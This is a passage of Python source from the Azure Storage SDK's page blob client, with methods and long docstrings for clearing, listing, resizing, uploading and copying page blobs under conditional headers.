the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the resource's ETag matches the value specified.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the resource does not exist, and fail the
operation if it does exist.
:param int timeout:
The timeout parameter is expressed in seconds.
"""
_validate_encryption_unsupported(self.require_encryption, self.key_encryption_key)
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
_validate_not_none('copy_source_url', copy_source_url)
request = HTTPRequest()
request.method = 'PUT'
request.host_locations = self._get_host_locations()
request.path = _get_path(container_name, blob_name)
request.query = {
'comp': 'page',
'timeout': _int_to_str(timeout),
}
request.headers = {
'x-ms-page-write': 'update',
'x-ms-copy-source': copy_source_url,
'x-ms-source-content-md5': source_content_md5,
'x-ms-source-if-Modified-Since': _datetime_to_utc_string(source_if_modified_since),
'x-ms-source-if-Unmodified-Since': _datetime_to_utc_string(source_if_unmodified_since),
'x-ms-source-if-Match': _to_str(source_if_match),
'x-ms-source-if-None-Match': _to_str(source_if_none_match),
'x-ms-lease-id': _to_str(lease_id),
'x-ms-if-sequence-number-le': _to_str(if_sequence_number_lte),
'x-ms-if-sequence-number-lt': _to_str(if_sequence_number_lt),
'x-ms-if-sequence-number-eq': _to_str(if_sequence_number_eq),
'If-Modified-Since': _datetime_to_utc_string(if_modified_since),
'If-Unmodified-Since': _datetime_to_utc_string(if_unmodified_since),
'If-Match': _to_str(if_match),
'If-None-Match': _to_str(if_none_match)
}
_validate_and_format_range_headers(
request,
start_range,
end_range,
align_to_page=True)
_validate_and_format_range_headers(
request,
source_range_start,
source_range_start+(end_range-start_range),
range_header_name="x-ms-source-range")
return self._perform_request(request, _parse_page_properties)
def clear_page(
self, container_name, blob_name, start_range, end_range,
lease_id=None, if_sequence_number_lte=None,
if_sequence_number_lt=None, if_sequence_number_eq=None,
if_modified_since=None, if_unmodified_since=None,
if_match=None, if_none_match=None, timeout=None):
'''
Clears a range of pages.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of existing blob.
:param int start_range:
Start of byte range to use for writing to a section of the blob.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-1023, etc.
:param int end_range:
End of byte range to use for writing to a section of the blob.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-1023, etc.
:param str lease_id:
Required if the blob has an active lease.
:param int if_sequence_number_lte:
If the blob's sequence number is less than or equal to
the specified value, the request proceeds; otherwise it fails.
:param int if_sequence_number_lt:
If the blob's sequence number is less than the specified
value, the request proceeds; otherwise it fails.
:param int if_sequence_number_eq:
If the blob's sequence number is equal to the specified
value, the request proceeds; otherwise it fails.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify an ETag value for this conditional
header to write the page only if the blob's ETag value matches the
value specified. If the values do not match, the Blob service fails.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify an ETag value for this conditional
header to write the page only if the blob's ETag value does not
match the value specified. If the values are identical, the Blob
service fails.
:param int timeout:
The timeout parameter is expressed in seconds.
:return: ETag and last modified properties for the updated Page Blob
:rtype: :class:`~azure.storage.blob.models.ResourceProperties`
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
request = HTTPRequest()
request.method = 'PUT'
request.host_locations = self._get_host_locations()
request.path = _get_path(container_name, blob_name)
request.query = {
'comp': 'page',
'timeout': _int_to_str(timeout),
}
request.headers = {
'x-ms-page-write': 'clear',
'x-ms-lease-id': _to_str(lease_id),
'x-ms-if-sequence-number-le': _to_str(if_sequence_number_lte),
'x-ms-if-sequence-number-lt': _to_str(if_sequence_number_lt),
'x-ms-if-sequence-number-eq': _to_str(if_sequence_number_eq),
'If-Modified-Since': _datetime_to_utc_string(if_modified_since),
'If-Unmodified-Since': _datetime_to_utc_string(if_unmodified_since),
'If-Match': _to_str(if_match),
'If-None-Match': _to_str(if_none_match)
}
_validate_and_format_range_headers(
request,
start_range,
end_range,
align_to_page=True)
return self._perform_request(request, _parse_page_properties)
def get_page_ranges(
self, container_name, blob_name, snapshot=None, start_range=None,
end_range=None, lease_id=None, if_modified_since=None,
if_unmodified_since=None, if_match=None, if_none_match=None, timeout=None):
'''
Returns the list of valid page ranges for a Page Blob or snapshot
of a page blob.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of existing blob.
:param str snapshot:
The snapshot parameter is an opaque DateTime value that,
when present, specifies the blob snapshot to retrieve information
from.
:param int start_range:
Start of byte range to use for getting valid page ranges.
If no end_range is given, all bytes after the start_range will be searched.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-, etc.
:param int end_range:
End of byte range to use for getting valid page ranges.
If end_range is given, start_range must be provided.
            This range will return valid page ranges from the offset start up to
offset end.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-, etc.
:param str lease_id:
Required if the blob has an active lease.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the resource's ETag matches the value specified.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the resource does not exist, and fail the
operation if it does exist.
:param int timeout:
The timeout parameter is expressed in seconds.
:return: A list of valid Page Ranges for the Page Blob.
:rtype: list(:class:`~azure.storage.blob.models.PageRange`)
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
request = HTTPRequest()
request.method = 'GET'
request.host_locations = self._get_host_locations(secondary=True)
request.path = _get_path(container_name, blob_name)
request.query = {
'comp': 'pagelist',
'snapshot': _to_str(snapshot),
'timeout': _int_to_str(timeout),
}
request.headers = {
'x-ms-lease-id': _to_str(lease_id),
'If-Modified-Since': _datetime_to_utc_string(if_modified_since),
'If-Unmodified-Since': _datetime_to_utc_string(if_unmodified_since),
'If-Match': _to_str(if_match),
'If-None-Match': _to_str(if_none_match),
}
if start_range is not None:
_validate_and_format_range_headers(
request,
start_range,
end_range,
start_range_required=False,
end_range_required=False,
align_to_page=True)
return self._perform_request(request, _convert_xml_to_page_ranges)
def get_page_ranges_diff(
self, container_name, blob_name, previous_snapshot, snapshot=None,
start_range=None, end_range=None, lease_id=None, if_modified_since=None,
if_unmodified_since=None, if_match=None, if_none_match=None, timeout=None):
'''
The response will include only the pages that are different between either a
recent snapshot or the current blob and a previous snapshot, including pages
that were cleared.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of existing blob.
:param str previous_snapshot:
The snapshot parameter is an opaque DateTime value that
specifies a previous blob snapshot to be compared
against a more recent snapshot or the current blob.
:param str snapshot:
The snapshot parameter is an opaque DateTime value that
specifies a more recent blob snapshot to be compared
against a previous snapshot (previous_snapshot).
:param int start_range:
Start of byte range to use for getting different page ranges.
If no end_range is given, all bytes after the start_range will be searched.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-, etc.
:param int end_range:
End of byte range to use for getting different page ranges.
If end_range is given, start_range must be provided.
            This range will return valid page ranges from the offset start up to
offset end.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-, etc.
:param str lease_id:
Required if the blob has an active lease.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the resource's ETag matches the value specified.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the resource does not exist, and fail the
operation if it does exist.
:param int timeout:
The timeout parameter is expressed in seconds.
:return: A list of different Page Ranges for the Page Blob.
:rtype: list(:class:`~azure.storage.blob.models.PageRange`)
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
_validate_not_none('previous_snapshot', previous_snapshot)
request = HTTPRequest()
request.method = 'GET'
request.host_locations = self._get_host_locations(secondary=True)
request.path = _get_path(container_name, blob_name)
request.query = {
'comp': 'pagelist',
'snapshot': _to_str(snapshot),
'prevsnapshot': _to_str(previous_snapshot),
'timeout': _int_to_str(timeout),
}
request.headers = {
'x-ms-lease-id': _to_str(lease_id),
'If-Modified-Since': _datetime_to_utc_string(if_modified_since),
'If-Unmodified-Since': _datetime_to_utc_string(if_unmodified_since),
'If-Match': _to_str(if_match),
'If-None-Match': _to_str(if_none_match),
}
if start_range is not None:
_validate_and_format_range_headers(
request,
start_range,
end_range,
start_range_required=False,
end_range_required=False,
align_to_page=True)
return self._perform_request(request, _convert_xml_to_page_ranges)
def set_sequence_number(
self, container_name, blob_name, sequence_number_action, sequence_number=None,
lease_id=None, if_modified_since=None, if_unmodified_since=None,
if_match=None, if_none_match=None, timeout=None):
'''
Sets the blob sequence number.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of existing blob.
:param str sequence_number_action:
This property indicates how the service should modify the blob's sequence
number. See :class:`~azure.storage.blob.models.SequenceNumberAction` for more information.
:param str sequence_number:
This property sets the blob's sequence number. The sequence number is a
user-controlled property that you can use to track requests and manage
concurrency issues.
:param str lease_id:
Required if the blob has an active lease.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the resource's ETag matches the value specified.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the resource does not exist, and fail the
operation if it does exist.
:param int timeout:
The timeout parameter is expressed in seconds.
:return: ETag and last modified properties for the updated Page Blob
:rtype: :class:`~azure.storage.blob.models.ResourceProperties`
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
_validate_not_none('sequence_number_action', sequence_number_action)
request = HTTPRequest()
request.method = 'PUT'
request.host_locations = self._get_host_locations()
request.path = _get_path(container_name, blob_name)
request.query = {
'comp': 'properties',
'timeout': _int_to_str(timeout),
}
request.headers = {
'x-ms-blob-sequence-number': _to_str(sequence_number),
'x-ms-sequence-number-action': _to_str(sequence_number_action),
'x-ms-lease-id': _to_str(lease_id),
'If-Modified-Since': _datetime_to_utc_string(if_modified_since),
'If-Unmodified-Since': _datetime_to_utc_string(if_unmodified_since),
'If-Match': _to_str(if_match),
'If-None-Match': _to_str(if_none_match),
}
return self._perform_request(request, _parse_page_properties)
def resize_blob(
self, container_name, blob_name, content_length,
lease_id=None, if_modified_since=None, if_unmodified_since=None,
if_match=None, if_none_match=None, timeout=None):
'''
Resizes a page blob to the specified size. If the specified value is less
than the current size of the blob, then all pages above the specified value
are cleared.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of existing blob.
:param int content_length:
Size to resize blob to.
:param str lease_id:
Required if the blob has an active lease.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the resource's ETag matches the value specified.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the resource does not exist, and fail the
operation if it does exist.
:param int timeout:
The timeout parameter is expressed in seconds.
:return: ETag and last modified properties for the updated Page Blob
:rtype: :class:`~azure.storage.blob.models.ResourceProperties`
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
_validate_not_none('content_length', content_length)
request = HTTPRequest()
request.method = 'PUT'
request.host_locations = self._get_host_locations()
request.path = _get_path(container_name, blob_name)
request.query = {
'comp': 'properties',
'timeout': _int_to_str(timeout),
}
request.headers = {
'x-ms-blob-content-length': _to_str(content_length),
'x-ms-lease-id': _to_str(lease_id),
'If-Modified-Since': _datetime_to_utc_string(if_modified_since),
'If-Unmodified-Since': _datetime_to_utc_string(if_unmodified_since),
'If-Match': _to_str(if_match),
'If-None-Match': _to_str(if_none_match),
}
return self._perform_request(request, _parse_page_properties)
# ----Convenience APIs-----------------------------------------------------
def create_blob_from_path(
self, container_name, blob_name, file_path, content_settings=None,
metadata=None, validate_content=False, progress_callback=None, max_connections=2,
lease_id=None, if_modified_since=None, if_unmodified_since=None,
if_match=None, if_none_match=None, timeout=None, premium_page_blob_tier=None):
'''
Creates a new blob from a file path, or updates the content of an
existing blob, with automatic chunking and progress notifications.
        Empty chunks are skipped, while non-empty ones (even if only partly filled) are uploaded.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of blob to create or update.
:param str file_path:
Path of the file to upload as the blob content.
:param ~azure.storage.blob.models.ContentSettings content_settings:
ContentSettings object used to set blob properties.
:param metadata:
Name-value pairs associated with the blob as metadata.
:type metadata: dict(str, str)
:param bool validate_content:
If true, calculates an MD5 hash for each page of the blob. The storage
service checks the hash of the content that has arrived with the hash
that was sent. This is primarily valuable for detecting bitflips on
the wire if using http instead of https as https (the default) will
already validate. Note that this MD5 hash is not stored with the
blob.
:param progress_callback:
Callback for progress with signature function(current, total) where
            current is the number of bytes transferred so far, and total is the
size of the blob, or None if the total size is unknown.
:type progress_callback: func(current, total)
:param int max_connections:
Maximum number of parallel connections to use.
:param str lease_id:
Required if the blob has an active lease.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the resource's ETag matches the value specified.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the resource does not exist, and fail the
operation if it does exist.
:param int timeout:
The timeout parameter is expressed in seconds. This method may make
multiple calls to the Azure service and the timeout will apply to
each call individually.
:param premium_page_blob_tier:
A page blob tier value to set the blob to. The tier correlates to the size of the
blob and number of allowed IOPS. This is only applicable to page blobs on
premium storage accounts.
:return: ETag and last modified properties for the Page Blob
:rtype: :class:`~azure.storage.blob.models.ResourceProperties`
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
_validate_not_none('file_path', file_path)
count = path.getsize(file_path)
with open(file_path, 'rb') as stream:
return self.create_blob_from_stream(
container_name=container_name,
blob_name=blob_name,
stream=stream,
count=count,
content_settings=content_settings,
metadata=metadata,
validate_content=validate_content,
progress_callback=progress_callback,
max_connections=max_connections,
lease_id=lease_id,
if_modified_since=if_modified_since,
if_unmodified_since=if_unmodified_since,
if_match=if_match,
if_none_match=if_none_match,
timeout=timeout,
premium_page_blob_tier=premium_page_blob_tier)
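    # Illustrative usage sketch, not part of the library: uploads a local file
    # whose size is a multiple of 512 bytes, since page blob content must be
    # 512-byte aligned. `service`, the container and the paths are placeholders.
    #
    #     service = PageBlobService(account_name='myaccount', account_key='mykey')
    #     service.create_blob_from_path(
    #         'mycontainer', 'disk.vhd', '/tmp/disk.vhd',
    #         metadata={'source': 'local-upload'}, max_connections=4)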
def create_blob_from_stream(
self, container_name, blob_name, stream, count, content_settings=None,
metadata=None, validate_content=False, progress_callback=None,
max_connections=2, lease_id=None, if_modified_since=None,
if_unmodified_since=None, if_match=None, if_none_match=None, timeout=None,
premium_page_blob_tier=None):
'''
Creates a new blob from a file/stream, or updates the content of an
existing blob, with automatic chunking and progress notifications.
        Empty chunks are skipped, while non-empty ones (even if only partly filled) are uploaded.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of blob to create or update.
:param io.IOBase stream:
Opened file/stream to upload as the blob content.
:param int count:
Number of bytes to read from the stream. This is required, a page
blob cannot be created if the count is unknown.
:param ~azure.storage.blob.models.ContentSettings content_settings:
ContentSettings object used to set the blob properties.
:param metadata:
Name-value pairs associated with the blob as metadata.
:type metadata: dict(str, str)
:param bool validate_content:
If true, calculates an MD5 hash for each page of the blob. The storage
service checks the hash of the content that has arrived with the hash
that was sent. This is primarily valuable for detecting bitflips on
the wire if using http instead of https as https (the default) will
already validate. Note that this MD5 hash is not stored with the
blob.
:param progress_callback:
Callback for progress with signature function(current, total) where
            current is the number of bytes transferred so far, and total is the
size of the blob, or None if the total size is unknown.
:type progress_callback: func(current, total)
:param int max_connections:
Maximum number of parallel connections to use. Note that parallel upload
requires the stream to be seekable.
:param str lease_id:
Required if the blob has an active lease.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the resource's ETag matches the value specified.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the resource does not exist, and fail the
operation if it does exist.
:param int timeout:
The timeout parameter is expressed in seconds. This method may make
multiple calls to the Azure service and the timeout will apply to
each call individually.
:param premium_page_blob_tier:
A page blob tier value to set the blob to. The tier correlates to the size of the
blob and number of allowed IOPS. This is only applicable to page blobs on
premium storage accounts.
:return: ETag and last modified properties for the Page Blob
:rtype: :class:`~azure.storage.blob.models.ResourceProperties`
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
_validate_not_none('stream', stream)
_validate_not_none('count', count)
_validate_encryption_required(self.require_encryption, self.key_encryption_key)
if count < 0:
raise ValueError(_ERROR_VALUE_NEGATIVE.format('count'))
if count % _PAGE_ALIGNMENT != 0:
raise ValueError(_ERROR_PAGE_BLOB_SIZE_ALIGNMENT.format(count))
cek, iv, encryption_data = None, None, None
if self.key_encryption_key is not None:
cek, iv, encryption_data = _generate_blob_encryption_data(self.key_encryption_key)
response = self._create_blob(
container_name=container_name,
blob_name=blob_name,
content_length=count,
content_settings=content_settings,
metadata=metadata,
lease_id=lease_id,
premium_page_blob_tier=premium_page_blob_tier,
if_modified_since=if_modified_since,
if_unmodified_since=if_unmodified_since,
if_match=if_match,
if_none_match=if_none_match,
timeout=timeout,
encryption_data=encryption_data
)
if count == 0:
return response
        # _upload_blob_chunks returns block ids for block blobs, so resource_properties
        # is passed as a parameter to collect the last_modified and etag for page and append blobs.
        # Block blobs do not need this because _put_block_list is called afterwards and returns that info.
resource_properties = ResourceProperties()
_upload_blob_chunks(
blob_service=self,
container_name=container_name,
blob_name=blob_name,
blob_size=count,
block_size=self.MAX_PAGE_SIZE,
stream=stream,
max_connections=max_connections,
progress_callback=progress_callback,
validate_content=validate_content,
lease_id=lease_id,
uploader_class=_PageBlobChunkUploader,
if_match=response.etag,
timeout=timeout,
content_encryption_key=cek,
initialization_vector=iv,
resource_properties=resource_properties
)
return resource_properties
def create_blob_from_bytes(
self, container_name, blob_name, blob, index=0, count=None,
content_settings=None, metadata=None, validate_content=False,
progress_callback=None, max_connections=2, lease_id=None,
if_modified_since=None, if_unmodified_since=None, if_match=None,
if_none_match=None, timeout=None, premium_page_blob_tier=None):
'''
Creates a new blob from an array of bytes, or updates the content
of an existing blob, with automatic chunking and progress
        notifications. Empty chunks are skipped, while non-empty ones (even if only partly filled) are uploaded.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of blob to create or update.
:param bytes blob:
Content of blob as an array of bytes.
:param int index:
Start index in the byte array.
:param int count:
Number of bytes to upload. Set to None or negative value to upload
all bytes starting from index.
:param ~azure.storage.blob.models.ContentSettings content_settings:
ContentSettings object used to set blob properties.
:param metadata:
Name-value pairs associated with the blob as metadata.
:type metadata: dict(str, str)
:param bool validate_content:
If true, calculates an MD5 hash for each page of the blob. The storage
service checks the hash of the content that has arrived with the hash
that was sent. This is primarily valuable for detecting bitflips on
the wire if using http instead of https as https (the default) will
already validate. Note that this MD5 hash is not stored with the
blob.
:param progress_callback:
Callback for progress with signature function(current, total) where
            current is the number of bytes transferred so far, and total is the
size of the blob, or None if the total size is unknown.
:type progress_callback: func(current, total)
:param int max_connections:
Maximum number of parallel connections to use.
:param str lease_id:
Required if the blob has an active lease.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the resource's ETag matches the value specified.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the resource does not exist, and fail the
operation if it does exist.
:param int timeout:
The timeout parameter is expressed in seconds. This method may make
multiple calls to the Azure service and the timeout will apply to
each call individually.
:param premium_page_blob_tier:
A page blob tier value to set the blob to. The tier correlates to the size of the
blob and number of allowed IOPS. This is only applicable to page blobs on
premium storage accounts.
:return: ETag and last modified properties for the Page Blob
:rtype: :class:`~azure.storage.blob.models.ResourceProperties`
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
_validate_not_none('blob', blob)
_validate_type_bytes('blob', blob)
if index < 0:
raise IndexError(_ERROR_VALUE_NEGATIVE.format('index'))
if count is None or count < 0:
count = len(blob) - index
stream = BytesIO(blob)
stream.seek(index)
return self.create_blob_from_stream(
container_name=container_name,
blob_name=blob_name,
stream=stream,
count=count,
content_settings=content_settings,
metadata=metadata,
validate_content=validate_content,
lease_id=lease_id,
progress_callback=progress_callback,
max_connections=max_connections,
if_modified_since=if_modified_since,
if_unmodified_since=if_unmodified_since,
if_match=if_match,
if_none_match=if_none_match,
timeout=timeout,
premium_page_blob_tier=premium_page_blob_tier)
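    # Illustrative usage sketch, not part of the library: page blob content must
    # be a multiple of 512 bytes, so the payload is zero-padded before upload.
    # `service` is a placeholder PageBlobService instance.
    #
    #     data = b'hello page blob'
    #     padded = data + b'\x00' * (-len(data) % 512)
    #     service.create_blob_from_bytes('mycontainer', 'frombytes.bin', padded)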
def set_premium_page_blob_tier(
self, container_name, blob_name, premium_page_blob_tier,
timeout=None):
'''
Sets the page blob tiers on the blob. This API is only supported for page blobs on premium accounts.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of blob to update.
:param PremiumPageBlobTier premium_page_blob_tier:
A page blob tier value to set the blob to. The tier correlates to the size of the
blob and number of allowed IOPS. This is only applicable to page blobs on
premium storage accounts.
:param int timeout:
The timeout parameter is expressed in seconds. This method may make
multiple calls to the Azure service and the timeout will apply to
each call individually.
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
_validate_not_none('premium_page_blob_tier', premium_page_blob_tier)
request = HTTPRequest()
request.method = 'PUT'
request.host_locations = self._get_host_locations()
request.path = _get_path(container_name, blob_name)
request.query = {
'comp': 'tier',
'timeout': _int_to_str(timeout),
}
request.headers = {
'x-ms-access-tier': _to_str(premium_page_blob_tier)
}
self._perform_request(request)
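    # Illustrative usage sketch, not part of the library: changes the tier of a
    # page blob on a premium storage account. `PremiumPageBlobTier` is assumed to
    # be the tier enum from azure.storage.blob.models; `service` is a placeholder.
    #
    #     from azure.storage.blob.models import PremiumPageBlobTier
    #     service.set_premium_page_blob_tier('mycontainer', 'disk.vhd',
    #                                        PremiumPageBlobTier.P10)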
def copy_blob(self, container_name, blob_name, copy_source,
metadata=None,
source_if_modified_since=None,
source_if_unmodified_since=None,
source_if_match=None, source_if_none_match=None,
destination_if_modified_since=None,
destination_if_unmodified_since=None,
destination_if_match=None,
destination_if_none_match=None,
destination_lease_id=None,
source_lease_id=None, timeout=None,
premium_page_blob_tier=None):
'''
Copies a blob asynchronously. This operation returns a copy operation
properties object, including a copy ID you can use to check or abort the
copy operation. The Blob service copies blobs on a best-effort basis.
The source blob for a copy operation must be a page blob. If the destination
blob already exists, it must be of the same blob type as the source blob.
Any existing destination blob will be overwritten.
The destination blob cannot be modified while a copy operation is in progress.
When copying from a page blob, the Blob service creates a destination page
blob of the source blob's length, initially containing all zeroes. Then
the source page ranges are enumerated, and non-empty ranges are copied.
If the tier on the source blob is larger than the tier being passed to this
copy operation or if the size of the blob exceeds the tier being passed to
this copy operation then the operation will fail.
You can call get_blob_properties on the destination
blob to check the status of the copy operation. The final blob will be
committed when the copy completes.
:param str container_name:
Name of the destination container. The container must exist.
:param str blob_name:
Name of the destination blob. If the destination blob exists, it will
be overwritten. Otherwise, it will be created.
:param str copy_source:
A URL of up to 2 KB in length that specifies an Azure file or blob.
The value should be URL-encoded as it would appear in a request URI.
If the source is in another account, the source must either be public
or must be authenticated via a shared access signature. If the source
is public, no authentication is required.
Examples:
https://myaccount.blob.core.windows.net/mycontainer/myblob
https://myaccount.blob.core.windows.net/mycontainer/myblob?snapshot=<DateTime>
https://otheraccount.blob.core.windows.net/mycontainer/myblob?sastoken
:param metadata:
Name-value pairs associated with the blob as metadata. If no name-value
pairs are specified, the operation will copy the metadata from the
source blob or file to the destination blob. If one or more name-value
pairs are specified, the destination blob is created with the specified
metadata, and metadata is not copied from the source blob or file.
:type metadata: dict(str, str).
:param datetime source_if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this conditional header to copy the blob only if the source
blob has been modified since the specified date/time.
:param datetime source_if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this conditional header to copy the blob only if the source blob
has not been modified since the specified date/time.
:param ETag source_if_match:
An ETag value, or the wildcard character (*). Specify this conditional
header to copy the source blob only if its ETag matches the value
specified. If the ETag values do not match, the Blob service returns
status code 412 (Precondition Failed). This header cannot be specified
if the source is an Azure File.
:param ETag source_if_none_match:
An ETag value, or the wildcard character (*). Specify this conditional
header to copy the blob only if its ETag does not match the value
specified. If the values are identical, the Blob service returns status
code 412 (Precondition Failed). This header cannot be specified if the
source is an Azure File.
:param datetime destination_if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this conditional header to copy the blob only
if the destination blob has been modified since the specified date/time.
If the destination blob has not been modified, the Blob service returns
status code 412 (Precondition Failed).
:param datetime destination_if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
